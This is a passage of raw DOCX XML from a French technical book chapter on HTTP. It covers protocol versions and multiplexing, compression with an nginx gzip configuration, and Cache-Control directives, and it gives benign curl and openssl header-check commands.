            <w:tcW w:type="dxa" w:w="271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Multiplexage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="247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Limite principale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1729"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2099"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2717"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Non (pipelining abandonné)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2470"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Blocage en tête de ligne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="172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HTTP/2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="209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TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="271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Oui, sur une connexion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="247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Blocage TCP en cas de perte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1729"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTP/3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2099"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>QUIC (UDP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2717"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Oui, indépendant par flux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2470"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Support client à vérifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2667000"/>
            <wp:docPr id="69" name="Picture 69"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f67.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId101"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2667000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.67 — Deux approches du multiplexage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois vérifications de version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Vérifier la version réellement négociée</w:t>
        <w:br/>
        <w:t>curl -sI --http2 https://exemple.fr | head -1</w:t>
        <w:br/>
        <w:t>curl -sI --http3 https://exemple.fr | head -1</w:t>
        <w:br/>
        <w:br/>
        <w:t># Détails de la négociation TLS et ALPN</w:t>
        <w:br/>
        <w:t>openssl s_client -connect exemple.fr:443 -alpn h2 -brief</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>57.5 Compression et contenus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La compression réduit le poids transféré, au prix d'un peu de processeur. Elle s'applique au texte, jamais aux formats déjà compressés.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.202 — Quatre options de compression</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14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Format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="257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Ratio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="429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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2146"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>gzip</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Bon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4292"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Universel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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br</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Brotli)</w:t>
            </w:r>
          </w:p>
        </w:tc>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Meilleur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="429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Navigateurs modernes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2146"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>zstd</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Très bon et rapide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4292"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Support récent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Aucune</w:t>
            </w:r>
          </w:p>
        </w:tc>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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="429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Images JPEG, WebP, vidéos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une configuration équilibrée · nginx</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Nginx : compression et types concernés</w:t>
        <w:br/>
        <w:t>gzip on;</w:t>
        <w:br/>
        <w:t>gzip_comp_level 5;</w:t>
        <w:br/>
        <w:t>gzip_min_length 256;</w:t>
        <w:br/>
        <w:t>gzip_types text/css application/javascript application/json image/svg+xml;</w:t>
        <w:br/>
        <w:br/>
        <w:t># Ne jamais recompresser ce qui l'est déjà</w:t>
        <w:br/>
        <w:t># (JPEG, PNG, WebP, MP4, ZIP)</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NÉGOCIATION DE CONTENU</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Mécanisme par lequel le client annonce ses capacités (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Accept-Encoding</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">) et le serveur choisit une représentation. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Vary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> indique aux caches que la réponse dépend de cet en-tête.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>57.6 Cache HTTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le cache est le levier de performance le plus rentable, à condition que les en-têtes soient justes. Deux stratégies se combinent : la fraîcheur et la revalidation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre politiques · http</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Fichier versionné : cache long et immuable</w:t>
        <w:br/>
        <w:t>Cache-Control: public, max-age=31536000, immutable</w:t>
        <w:br/>
        <w:br/>
        <w:t># HTML : toujours revalidé</w:t>
        <w:br/>
        <w:t>Cache-Control: no-cache</w:t>
        <w:br/>
        <w:t>ETag: "a1b2c3"</w:t>
        <w:br/>
        <w:br/>
        <w:t># API : fraîcheur courte, tolérance à la péremption</w:t>
        <w:br/>
        <w:t>Cache-Control: public, max-age=60, stale-while-revalidate=30</w:t>
        <w:br/>
        <w:br/>
        <w:t># Donnée personnelle : jamais en cache partagé</w:t>
        <w:br/>
        <w:t>Cache-Control: private, no-store</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.203 — Cinq directives de cache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4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Directive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3414"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max-age</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Durée de fraîcheur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Toutes ressources</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="341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no-cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Revalider avant usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3414"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>no-store</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ne pas stocker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Données sensibles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="341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immutable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Ne pas revalider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Fichiers versionnés</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3414"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>stale-while-revalidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Servir périmé en revalidant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux vérifications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Vérifier le comportement du cache</w:t>
        <w:br/>
        <w:t>curl -sI https://exemple.fr/app.3f2a91.js | grep -i cache</w:t>
        <w:br/>
        <w:t>curl -sI https://exemple.fr/ | grep -iE "etag|cache-control"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Simuler une revalidation</w:t>
        <w:br/>
        <w:t>curl -sI -H 'If-None-Match: "d4e5f6"' https://exemple.fr/ | head -1</w:t>
        <w:br/>
        <w:t># 304 Not Modified si le contenu est inchangé</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DIAGNOSTIC HTTP EN CINQ COMMANDES</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curl -I</w:t>
            </w:r>
            <w:r>
              <w:rPr>
